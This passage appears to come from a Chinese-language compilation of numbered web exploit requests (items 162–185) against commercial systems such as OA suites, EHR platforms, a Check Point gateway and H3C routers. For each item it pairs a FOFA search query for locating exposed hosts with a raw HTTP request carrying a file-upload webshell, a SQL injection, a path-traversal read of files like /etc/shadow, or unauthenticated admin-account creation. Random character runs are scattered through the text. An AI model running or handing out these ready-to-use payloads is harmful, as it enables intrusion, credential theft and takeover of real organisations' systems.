{/ r8 `0 R7 B</soap:Envelope>2 |! Y+ V0 ]! G0 i' V0 `, v
% f9 m2 V1 D+ j5 J$ c
) E6 }( a r* e3 o+ V) l
http://x.x.x.x/dizxdell.aspx* q9 i3 u. w5 `; s6 w7 I$ H
. u! K& K; W( a; W3 j i162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
v4 s& I* E0 U9 m, u/ ZFOFA: app="和丰山海-数字标牌"+ `0 b4 e, u1 d: W4 J8 s
POST /QH.aspx HTTP/1.1/ Y/ C; y6 P& z2 w% d. Q
Host: x.x.x.x
& P# G6 I5 q1 x8 IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
, A4 \$ z9 w7 Y* M6 D6 jConnection: close( W( h/ _1 I, v
Content-Length: 583
7 R% m+ ^. r$ f/ Y D4 |' z% LContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
% E7 N: w( b1 @( }Accept-Encoding: gzip/ d. e8 E* ?( d- N
: s* m2 I) r; t------WebKitFormBoundaryeegvclmyurlotuey
. n+ f% [; t4 q# Z. AContent-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"- ?/ |* s% p4 A9 o3 X8 O9 P
Content-Type: application/octet-stream) ~. ]: t' S- M
8 {5 j- }/ Z0 p0 \4 b: v& c
<% response.write("ujidwqfuuqjalgkvrpqy") %>( d$ f: s2 t1 b+ ?+ F1 J
------WebKitFormBoundaryeegvclmyurlotuey
* L9 U' ]8 x0 L" @. QContent-Disposition: form-data; name="action"* x3 a5 d; f& y8 t* J
! D3 }& I8 v# l
upload! ?. }* x& g) }; K) X$ h2 m
------WebKitFormBoundaryeegvclmyurlotuey( \8 ^7 ?! ~1 a$ n/ S1 E
Content-Disposition: form-data; name="responderId"( o6 n- J5 H! B( j
( X) D' |% c; pResourceNewResponder e ]* K. S' H+ r
------WebKitFormBoundaryeegvclmyurlotuey
1 e& T- T8 {) I# n4 LContent-Disposition: form-data; name="remotePath"1 C: t) o( N. u& g, F$ C; B
( m7 f3 e. A0 U" h" X/opt/resources* k5 [! T, _9 f L
------WebKitFormBoundaryeegvclmyurlotuey--# ?3 q. C. U' b: D5 V
& ]& M+ @4 E2 h* `& {
! ^6 p# \/ m- _. f% V8 Whttp://x.x.x.x/opt/resources/kjuhitjgk.aspx- e, i* r) a+ m/ D& \5 e* m; e
, f5 \% V: C( d2 _0 D
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
% A2 }3 @; R7 X6 Z. Z2 x2 D" bFOFA: icon_hash="-795291075"
1 y6 o5 p. w5 W7 I9 ?/ v [/ z: f0 q/ FPOST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1, s' b8 k7 P9 H+ k' ^
Host: x.x.x.x
7 P# p/ ?2 m8 `6 X( }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
. L% ?/ l, l* XConnection: close2 @$ s2 j! D& a' e" Z
Content-Length: 293
5 m" S2 v1 a' w, I7 v$ V% |Accept: */* K1 g2 v4 W( X/ R2 [9 R5 S6 j: x( t
Accept-Encoding: gzip, deflate
+ ~+ Y" ^1 f; n6 @Accept-Language: zh-CN,zh;q=0.9
' r5 x; {+ j- g1 l1 Y' k' TContent-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod
* G2 u' i/ }- H- f$ m4 `/ A% c2 x. d! [/ W7 K
------iiqvnofupvhdyrcoqyuujyetjvqgocod
% A& H) |" Z% a! [7 b) v$ |" EContent-Disposition: form-data; name="name"/ x3 c x4 J' _7 w$ Q
2 F. m, ?+ [) t/ H- N; G1.php
. C8 B, I6 P1 ]9 e0 }! P" o/ A% j( ?------iiqvnofupvhdyrcoqyuujyetjvqgocod
: h2 g: R3 C( v, W" zContent-Disposition: form-data; name="upfile"; filename="1.php"( G0 R, F; d6 G4 X$ A9 a! G
Content-Type: image/jpeg9 ?4 G/ U& t3 t
8 `1 b0 J/ b0 O' S
rvjhvbhwwuooyiioxega, b, c4 x9 I8 G0 T, m
------iiqvnofupvhdyrcoqyuujyetjvqgocod--
4 P* S ^& }' [4 Y3 I' U' o7 ]' n' P, f: X& r
" f& h3 q( M0 N. i6 ?
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
) ^% J, \$ A H3 L4 B+ `5 D4 R2 H& ~FOFA: title="智慧综合管理平台登入"2 o, P/ f2 d6 R2 d7 }
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1. m9 o9 i7 m T6 J9 u# W
Host: x.x.x.x
' t9 _: z. w$ H6 d& f! l" n+ l7 Y' nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
6 K& h8 Z2 d) Z" |6 `8 mContent-Length: 288
1 ?7 n( h. W1 K/ HAccept: application/json, text/javascript, */*; q=0.018 v( Q* L* O5 b% u; A
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
( z+ S j" ^6 L1 p* |4 FConnection: close
2 I0 V& W9 P* I# n4 B( gContent-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl! O7 Z7 z1 N1 L2 E0 d" y/ ?
X-Requested-With: XMLHttpRequest
, P5 V! {$ C1 }8 ]Accept-Encoding: gzip
" W! d: W; P: D: J; s; W7 k
* f9 T C! J, B6 L% k) d0 ?------dqdaieopnozbkapjacdbdthlvtlyl
! C& c" Y4 U+ R* {, XContent-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
& O' E/ g/ E8 P# i/ lContent-Type: image/jpeg
, A# \4 f7 F. H- F7 l8 ?0 ]8 u7 _* ]& @" Y. p3 }3 y
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>7 Z) R+ _; Y0 f2 g
------dqdaieopnozbkapjacdbdthlvtlyl--2 W* X$ ]/ X. [' n# M5 A
- x3 @4 f9 V, g. h3 P8 q
; ?! s; T: b3 m. l
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
4 }; ^# v2 V7 U( Q& r
6 i8 b1 t2 ?) I9 u5 ^( x165. OrangeHRM 3.3.3 SQL 注入/ X! Y3 O. _5 ?5 T* ~9 J
CVE-2024-36428# I# X. p" x3 G# m$ c; }
FOFA: app="OrangeHRM-产品"1 _+ j m: |$ T" I' o/ ?
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
/ S: T: b& `8 f. ]! r% |; u' U0 G, ]8 }+ o5 Z9 S% r% q, E/ @
) S7 Y- n5 G' Q* i7 q5 }* x166. 中成科信票务管理平台SeatMapHandler SQL注入
# D$ C! T# J y& x* gFOFA:body="技术支持:北京中成科信科技发展有限公司"2 M/ w5 i7 d$ g! w) p4 h
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1: l/ b) F1 p5 d- y) \5 g$ ]* Z
Host:
+ \* q% p; X/ r* qPragma: no-cache
. v0 H$ o% h, H7 cCache-Control: no-cache
7 M+ O# d$ |, z3 ZUpgrade-Insecure-Requests: 1+ g# S3 G4 O t5 x7 n! V
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
, B& z! Z! X! TAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
' O: e+ A0 {, ?8 o2 K- L6 [Accept-Encoding: gzip, deflate
) ~* O" Q6 i: v, |0 `Accept-Language: zh-CN,zh;q=0.9,en;q=0.8$ m4 K- Z/ ~$ S0 ~1 @% t
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE$ s+ i' L/ S% ^& f; Q) c
Connection: close
; O. |- x2 _1 A; T, lContent-Type: application/x-www-form-urlencoded" S/ L( `" i7 N7 y- ?1 F
Content-Length: 89
$ d$ O% b7 C- Y; e! ~2 `7 Y5 a [7 h9 L' e+ w: M) @
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
' |( J1 a7 U4 v2 o7 M
6 r/ F$ o3 S5 A" K$ Q; {+ l' A9 y6 a8 N, z* o
167. 精益价值管理系统 DownLoad.aspx任意文件读取! z% z- s+ P, K7 Q2 }
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
+ }+ x; d' { r( E) e5 BGET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1; {0 o0 q! c1 J7 n2 \
Host:
. O' Q. d0 U+ u6 w: q# c. j6 JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.364 t# R* }8 p! `0 G
Content-Type: application/x-www-form-urlencoded
# v0 P+ w" d$ p0 ?! F4 CAccept-Encoding: gzip, deflate( R9 [- z, m/ R2 [ M" M. N
Accept: */*
& A( M1 `9 e# M5 r e' g2 F' ZConnection: keep-alive
1 R# Q' R5 Q9 `& ~6 e R+ J: B7 w7 ~! d+ m
: ]% w4 N; C" x/ v
168. 宏景EHR OutputCode 任意文件读取# Z" d7 r: [5 d8 q6 y# @
FOFA:app="HJSOFT-HCM"
9 l' C8 T! K3 U. l4 J/ T- aGET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1( h5 o+ F' P3 S5 k7 i. l
Host: your-ip# K t) W+ ?/ x9 N) d+ v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36) d$ h8 c7 A- I4 S' j
Content-Type: application/x-www-form-urlencoded' E: f: |% m* ~2 A7 @8 }! V' g
Connection: close; w j* `3 I: z3 t8 m
& g/ U- b% j* ~" `1 V8 ?1 @; p
2 X2 S- K& A, V/ P: f
5 K6 a* D9 U* P0 g R" d2 b1 E+ K169. 宏景EHR downlawbase SQL注入
( z4 {: h" ?+ G+ {: R& ~) N/ ~FOFA:app="HJSOFT-HCM"5 K' L9 _' S7 } x
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
, P- \ M+ e7 i: `0 UHost: your-ip0 [" T8 l4 Z& v9 s3 V/ d: k' v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
3 v0 }1 D. U$ T, ?3 t5 WAccept: */* E& Z9 O+ P: p) v2 R
Accept-Encoding: gzip, deflate
# N# \3 p, P1 jConnection: close( Y; ]7 e% P# p% d1 ^
$ @4 b' p. v/ J! q1 |
+ q5 ?. @: t" p1 D8 k
/ U# R* U9 L; n" C) Q170. 宏景EHR DisplayExcelCustomReport 任意文件读取
+ ]' ?9 E% m+ r ZFOFA:body="/general/sys/hjaxmanage.js"5 y3 \' Z! ]% H" ?
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
; S' l. Z- p2 k' }: ^1 W: I, fHost: balalanengliang9 q$ h, Q+ B9 s
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36: g& m5 S' v& z4 a6 h7 V
Content-Type: application/x-www-form-urlencoded
1 M: K" @' h( l+ o) M+ m4 K' W8 r+ ?
filename=../webapps/ROOT/WEB-INF/web.xml
# {1 ~' f2 {. F ?& i6 ~3 G2 I+ E$ Y& K( i- B2 n' M
' \# h+ N% w" Z' l1 t" U* r8 T1 t171. 通天星CMSV6车载定位监控平台 SQL注入' j) h" E! X: f' l. ~$ p0 H J
FOFA:body="/808gps/"
9 a7 r% \0 `( Z! s" m# `) V: T6 eGET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
- _8 Y/ N' l( ^" NHost: your-ip" Z: @3 l- h- x, r. `7 v6 v
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.06 I. D. [+ \4 |. ^+ I' U
Accept: */*- h* R1 @& I1 e- ?
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 k& n0 g0 h+ S0 y' y
Accept-Encoding: gzip, deflate
! L0 g" L- `: f0 l( J7 w, ~Connection: close$ n5 H4 q6 g% i" D% U+ |5 W
/ e; F/ |( m& b2 ? D
$ S) [8 ~" E- a2 Q2 g3 w
. f/ |' ? n0 R: ?
172. DT-高清车牌识别摄像机任意文件读取: c# D$ m7 k* K. R) K
FOFA:app="DT-高清车牌识别摄像机"
3 l+ ]) E, B5 |) X+ _3 ?GET /../../../../etc/passwd HTTP/1.1
5 i) K8 s; k# g( ^+ p0 zHost: your-ip
; r( L! p3 i! j' i) |! _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+ a( I9 A: V7 g' E7 [' ~Accept-Encoding: gzip, deflate* l2 C, n7 @0 N6 L( t" a1 H
Accept: */*& G. Q( H+ U) ]! I
Connection: keep-alive
5 | l( Q- Q# k9 {; |5 k& w
2 f) Z9 S W* `! V9 P) m5 V) p- q; j- C
, g( n8 ?1 T8 S6 X8 i* ^& t173. Check Point 安全网关任意文件读取
9 L' l7 A( r0 e/ j. O0 ZCVE-2024-24919
3 _" e6 R' O" t: M7 T. m' X; hFOFA:app="Check_Point-SSL-Network-Extender"
N5 O) m+ b" S9 W1 gPOST /clients/MyCRL HTTP/1.1. K. J. I+ G, H
Host: your-ip0 Q9 Q5 J8 I* h# y* p! Z
Content-Type: application/x-www-form-urlencoded6 o) @6 E" p, P4 H2 }) d; A
6 v9 P+ Z! j8 laCSHELL/../../../../../../../etc/shadow K) Y1 p) {& B/ F+ }, |
# a. g0 y: }4 i0 H/ P( a
7 L1 a& V2 k7 {( {# L- Y
, v) m( G I, C/ ^. @4 [% s174. 金和OA C6 FileDownLoad.aspx 任意文件读取
2 w5 u$ @9 x: j# v3 s: `5 K8 yFOFA:app="金和网络-金和OA"5 B9 s% T7 g, O2 b) v# u5 M$ B) c
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.13 m6 ]* W0 L. k! k% J
Host: your-ip7 _/ r' [' n+ t5 {* T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36& L {# b7 U; b7 U% l+ z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
. K8 }; O2 S/ X* ]/ eAccept-Encoding: gzip, deflate, br" `% b" P8 X! m3 V3 X
Accept-Language: zh-CN,zh;q=0.9# {3 x. g' y; {2 w9 V
Connection: close
5 y5 S7 Y+ q) T& [
' @+ Q4 k. C9 S Z2 v, v& L
) d* _% g! w. e8 g: ?+ c5 i J; n3 U
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入- Z! _" H' y6 c; O& ^/ T
FOFA:app="金和网络-金和OA"% k* ~8 U- f8 {8 Z
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1( x( a. q4 H" H
Host:( C6 t( a( N& c
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
' U7 j' P/ K9 Q& RAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
9 E4 |* N: L3 F! V) _0 \2 |3 w0 D3 u6 MAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# `! E5 p' Z* R: G9 O0 o+ c* L' z
Accept-Encoding: gzip, deflate' m: z* {+ i1 L( {1 `3 b
Connection: close/ Q' X6 y! Q3 h, Z
Upgrade-Insecure-Requests: 1
$ |+ ?# g1 b3 `% D! P% K9 G; M+ E( m( g# n
2 U. n0 w5 N) i8 R2 `. Z
176. 电信网关配置管理系统 rewrite.php 文件上传; ] _% E3 l& R+ v9 k# h
FOFA:body="img/login_bg3.png" && body="系统登录"
( I! Q* Y; E$ v% N2 @POST /manager/teletext/material/rewrite.php HTTP/1.19 s3 ~! `. f8 w
Host: your-ip4 @: j# D7 T$ h, l5 T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
' h, B6 u6 S- R0 _" l0 CContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
8 Y9 h* r* Y% d& C+ i" _Connection: close
" k ]7 K+ U/ i A' `, |( H
) i9 ^, u9 F3 c9 m------WebKitFormBoundaryOKldnDPT) p% \+ a8 u. R" v7 z. M, d
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
U/ [3 o/ S6 DContent-Type: image/png
) o9 \ ]1 z' P l5 }
F; D5 K) {9 K" {<?php system("cat /etc/passwd");unlink(__FILE__);?>
0 \3 I1 Z& O2 r) j. Y6 @. x* a' H------WebKitFormBoundaryOKldnDPT# e. n) a( m5 y) o5 O) P h
Content-Disposition: form-data; name="uploadtime"
7 N$ M# ^' o) J* q/ h
5 f5 Y4 X0 i( z& F* r
5 S0 V; H3 N8 h4 g, K; k------WebKitFormBoundaryOKldnDPT--
; i# g& R: s- B9 a3 {" ~1 y& B* Y8 Y4 i4 e' z
/ P. J8 _. R) v7 X
: q+ _* i" S; J% ]. T177. H3C路由器敏感信息泄露# C. K& R. p- E) R- T# f
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
% X8 w" e5 h1 l% k/userLogin.asp/../actionpolicy_status/../M60.cfg
) R* z7 K- E: r2 d, ~" T4 Q/userLogin.asp/../actionpolicy_status/../GR8300.cfg
) Y& A9 ~. T+ ]1 N+ S4 p/userLogin.asp/../actionpolicy_status/../GR5200.cfg% q8 V" ]5 ^, W+ H- {/ J- x& [
/userLogin.asp/../actionpolicy_status/../GR3200.cfg! N! O/ h. v- c
/userLogin.asp/../actionpolicy_status/../GR2200.cfg, F7 E# x, D0 o A- s5 m% x
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg0 U0 f2 I7 [, D" P9 f: @' ?
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
u! P8 B0 q5 m/ ?8 E/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
: n3 Z$ N9 f5 E$ h" d: k% t/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
I& _5 g6 L" h' i( ]6 m" G/ f/userLogin.asp/../actionpolicy_status/../ER5200.cfg
" v, F: ~1 \& s+ o$ [( [' v/userLogin.asp/../actionpolicy_status/../ER5100.cfg* c5 n3 f# h0 V' ~( N" ]
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg1 c. m5 X% A, Y+ c. X
/userLogin.asp/../actionpolicy_status/../ER3260.cfg( l E9 S/ [7 r+ U+ Z1 S; {
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
+ X: T5 F. i# `& i. g5 q$ s/userLogin.asp/../actionpolicy_status/../ER3200.cfg
$ ], @4 p( |# p% _% V/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg' d% V/ z7 z7 g' q
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg' F, i' O% A- M A( r( V% r
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
8 x: ^% ~. K! B) ^/userLogin.asp/../actionpolicy_status/../ER3100.cfg
" J( c/ t! g$ [. t/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
% y, [- ~ [6 c, r9 Q8 M. u8 j5 } `; S3 }: a( H, _0 J
$ q' f: i& V, S/ @" h g178. H3C校园网自助服务系统-flexfileupload-任意文件上传
' L9 `, _* h; K8 r; kFOFA:header="/selfservice"
8 k3 i# v' y: }" l& z( WPOST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.16 K* H# g* N3 |& b6 {2 [
Host:+ U3 K& y A+ A2 |# |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.367 T( B8 S- _( \. Y- u1 g7 i
Content-Length: 252. `- u( H; l: B c- |& H$ _3 u
Accept-Encoding: gzip, deflate3 E5 H3 z2 m. ^$ F& _
Connection: close
9 Y! z- ]8 }. M- ^) OContent-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l0 H' c I6 r) Q6 V f) o- z4 F
-----------------aqutkea7vvanpqy3rh2l$ |, n4 |9 t& q& z2 B! W4 Q) R
Content-Disposition: form-data; name="12234.txt"; filename="12234"; m! u; R: r& ~5 S$ h" N# L
Content-Type: application/octet-stream
+ P* h* U# N9 F+ ?/ x4 lContent-Length: 255
8 Y2 t$ Z# l% X$ B. g
1 [& C0 E3 Y- [6 k, ~% x1 O0 S122341 H3 a3 a! ~3 f6 c8 W; W8 j$ O
-----------------aqutkea7vvanpqy3rh2l--
/ j; m1 i. X1 e& d7 ~* P3 s S$ P1 w9 m; W
) B+ |9 I7 ~% q9 e4 v; F
GET /imc/primepush/%2e%2e/flex/12234.txt
/ `/ s4 d# D# q' X0 h3 V
3 V6 ], A0 L. y6 p, c7 H# L- E4 B. h4 e6 y; {& y- ~- ~' k3 E' T
179. 建文工程管理系统存在任意文件读取
7 z* ~, h4 {) f. c+ t! N4 ?% oPOST /Common/DownLoad2.aspx HTTP/1.1
7 Q0 ^& q( v1 R6 F d& mHost: {{Hostname}}
+ y/ n% N, T2 k; H" _% ^0 X7 PContent-Type: application/x-www-form-urlencoded
" ~% X) y8 b- `( _8 TUser-Agent: Mozilla/5.0. o# J: G' L. {) k3 J7 N$ ?/ W
! D& x; n1 ?5 o0 w' S4 ^* V
path=../log4net.config&Name=5 `" C/ q) w% w# y6 v9 h1 G
% m9 \3 ^: T, b: t0 Z4 ?9 i
5 O: ?. L' I6 k7 p( v% V180. 帮管客 CRM jiliyu SQL注入
; ?0 b8 h, C J8 m2 g* kFOFA:app="帮管客-CRM"; x" G O* m. a- n
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.19 l# D' M' v" H1 e N$ K' `
Host: your-ip8 i2 \( M$ ?5 v- [5 b \' |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.365 J+ K( B+ ~) F3 t: H, [3 @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
4 ~; V; @7 p7 ?9 f) {5 k8 l: o2 { [6 uAccept-Encoding: gzip, deflate
. J! ~: W: @8 q, H& v7 QAccept-Language: zh-CN,zh;q=0.9
" b# m5 u$ ^% B- g UConnection: close c2 z" S1 b; p4 G4 F' x8 d A
% Y! Q* r( |1 W. j2 t, R: X. l8 a9 g( w1 r" E7 }6 n: s* P
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
! G, k9 m4 a1 f5 g1 {) ~, GFOFA:"PDCA/js/_publicCom.js"+ o) d/ Q1 L. C! U$ H
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
# g& f- t5 v0 k K3 X7 YHost: your-ip& t4 W. I- k/ `7 p3 z4 Q* X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36# V1 {- w# Q0 ?3 [) N- i% N6 m
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
7 F+ J0 N# G- D# LAccept-Encoding: gzip, deflate, br) E) M4 P3 Z! [) X6 F
Accept-Language: zh-CN,zh;q=0.9: u7 L# H1 N+ l! I% G6 e7 n
Connection: close0 H) X. N8 P7 V! _3 C( z8 u% F
Content-Type: application/x-www-form-urlencoded
! Q$ ?6 q3 d/ b. Y$ I& B0 @# H' F
5 R+ u2 P2 X3 D7 r1 e* M1 M
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
7 e8 m, {2 j6 c) H8 W0 r
* [' |; c o( ?+ U2 h( k
. ?0 g: f/ e$ o+ J {4 O182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建7 D; \& c6 s! ]! I. X
FOFA:"PDCA/js/_publicCom.js"' F: N# a( K- `/ J9 K
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
* n I) T5 j5 f5 I7 N: _Host: your-ip/ n6 w( q! X7 M* z) k: N1 X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
' B9 _2 U0 h* L6 AAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" z# Y% ]+ a: N' g
Accept-Encoding: gzip, deflate, br; R) d7 Y$ ^7 Y7 \
Accept-Language: zh-CN,zh;q=0.9( |$ s* h+ b) z' Z, O m
Connection: close
& X- m( p+ e" F$ z8 oContent-Type: application/x-www-form-urlencoded1 _) I' J+ E# f+ _, @
2 R2 S3 p- p! ^6 z$ H2 \! M) R- G
0 ~$ U! K) {4 `* H5 U2 b gusername=test1234&pwd=test1234&savedays=17 A7 ]* B N# R* ^) h$ Y3 {& A. C
$ `* |$ ?, |8 }" I# v
R9 e, u. t. [1 G4 @' j
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
7 B0 z* f' w- U. ~9 z+ _# a& mFOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
+ ^% P/ q+ |! I, cGET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
% F8 }5 M, Y# H( ?Host: your-ip$ p# n8 q, p- _' j0 i% i
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
5 h' o. u' ]$ S# b2 |$ TAccept-Charset: utf-85 n4 V8 R6 W+ i4 Y
Accept-Encoding: gzip, deflate
. |% i; W2 ^ r' n# s% `% @) s' XConnection: close& L, }% L% G9 }. b/ N8 k- c5 X
/ X, P" h! O# b$ p3 D. Q9 X$ V
# d0 M- E0 B7 V) f- a/ e& a( V184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加) L$ ^7 m, f; z" y) r: x0 t9 e' _
FOFA:server="SunFull-Webs"
3 t$ q, x v% r8 p) t7 WPOST /soap/AddUser HTTP/1.10 ~1 b; q R) `2 F, q1 J
Host: your-ip0 E$ r$ v# p F3 q
Accept-Encoding: gzip, deflate$ @, T4 \: I9 Z3 X. e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
4 {# X6 y, G# C1 t0 sAccept: application/xml, text/xml, */*; q=0.01
1 m) Z6 T0 a0 u" aContent-Type: text/xml; charset=utf-8: o5 _; g; s2 h/ x$ M* i6 Y7 J
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: }( S" o7 O& A5 ~, ]5 N
X-Requested-With: XMLHttpRequest4 |8 l- B' R" F) O
7 _# c0 S8 q4 O/ B/ ~! `
$ j0 V2 z# |- f2 [! `' Minsert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')7 z" a M* r. `% u) E, b" j
8 m1 Z+ h! [8 l. j) E0 ?+ _% ~
! y, K9 V$ l$ u4 O. `9 S) q185. 瑞友天翼应用虚拟化系统SQL注入1 n/ G! {# y& U9 S
version < 7.0.5.1
& O) U0 _: l5 SFOFA:app="REALOR-天翼应用虚拟化系统"
" K1 k) _/ q: b& M2 g: zGET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
* i( M& d7 K6 u6 YHost: host
